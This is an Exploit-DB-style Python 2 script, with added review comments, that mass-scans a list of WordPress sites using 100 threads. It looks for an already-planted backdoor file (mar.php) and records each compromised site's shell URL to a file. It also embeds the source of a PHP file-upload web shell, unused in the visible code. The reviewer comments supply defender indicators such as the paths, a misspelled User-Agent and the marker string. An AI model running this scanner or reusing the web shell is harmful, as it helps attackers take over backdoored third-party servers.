# Exploit Title: WordPress Seotheme - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
#
# NOTE(review): this listing was extracted with its line breaks and
# indentation lost; the layout below is reconstructed. Where nesting cannot be
# recovered from syntax alone it is flagged inline -- confirm against the
# original listing.
#
# What the visible code does: for each site in an input list it requests two
# fixed paths (a plugin path and a theme path, both ending in mar.php) and
# checks the response body for a fixed marker string. It never uploads
# anything and never references the `shell` string defined below, so despite
# the title it only detects a file that is already present on the server.
#
# Indicators a defender can take from this page:
#   - files at /wp-content/plugins/seoplugins/mar.php and
#     /wp-content/themes/seotheme/mar.php
#   - GET requests for those paths carrying the User-Agent below, which
#     contains the misspellings "Mozlila", "Bulid" and "Moblie", together
#     with a scheme-less Referer of "www.google.com"
#   - responses containing the marker '//0x5a455553.github.io/MARIJUANA/icon.png'
import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)

# Short aliases for the colorama colour codes used in console output
# (fw and fm are not used in the visible code).
fr  =  Fore.RED
fc  =  Fore.CYAN
fw  =  Fore.WHITE
fg  =  Fore.GREEN
fm  =  Fore.MAGENTA

# PHP source for a file-upload form, held as a string. Nothing in the visible
# script reads `shell` again, so it is never sent to any host.
shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""

# Suppresses urllib3 warnings, including the one normally raised for the
# verify=False requests made further down.
requests.urllib3.disable_warnings()

# Static request headers sent with every probe. The User-Agent is a fixed
# string with three misspellings, which makes it usable as a log signature.
headers = {'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'referer': 'www.google.com'}

# Read the site list (one entry per line) from the file named by the first
# command-line argument; with no argument, print a usage line and exit.
try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    # Script name is taken as the last backslash-separated component of argv[0].
    path = str(sys.argv[0]).split('\\')
    exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')

def URLdomain(site):
    """Reduce *site* to the text before its first '/', after removing the scheme.

    The scheme is removed with str.replace, so every occurrence of the scheme
    string is dropped, not only the leading one.
    """
    if site.startswith("http://") :
        site = site.replace("http://","")
    elif site.startswith("https://") :
        site = site.replace("https://","")
    else :
        pass
    # '(.*)/' is greedy, so each pass keeps everything before the LAST slash;
    # repeating until no slash remains leaves only the leading segment.
    pattern = re.compile('(.*)/')
    while re.findall(pattern,site):
        sitez = re.findall(pattern,site)
        site = sitez[0]
    return site

def FourHundredThree(url):
    """Probe one site for mar.php under the plugin path, then the theme path.

    Each path is requested over http and, when the marker is absent, over
    https with certificate verification disabled. A hit is printed and the
    full URL is appended to seoplugins-Shells.txt or seotheme-Shells.txt.
    Any exception is reported as a failure. The print statements use
    Python 2 syntax.
    """
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)
        # A hit is decided only by this substring appearing in the response body.
        if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
            print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
            open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
        else:
            url = 'https://' + URLdomain(url)
            # verify=False: the server certificate is not validated.
            check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
            if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
                # NOTE(review): nesting reconstructed. The theme check is
                # placed here, inside the plugin-failure branch; the flattened
                # source would also admit it running unconditionally at the
                # `try` level. Confirm against the original listing.
                url = 'http://' + URLdomain(url)
                check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)
                if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                    open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
                else:
                    url = 'https://' + URLdomain(url)
                    check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
                    if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                        print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                        open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
                    else:
                        print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    except :
        # Bare except: timeouts, connection errors and every other exception
        # are all reported as the same failure line.
        print ' -| ' + url + ' --> {}[Failed]'.format(fr)

# multiprocessing.dummy.Pool is thread-based: 100 worker threads process the
# site list concurrently, so requests from one source arrive in bursts.
mp = Pool(100)
mp.map(FourHundredThree, target)
mp.close()
mp.join()

# The message names "Shells.txt", but the code above writes to
# seoplugins-Shells.txt and seotheme-Shells.txt.
print '\n [!] {}Saved in Shells.txt'.format(fc)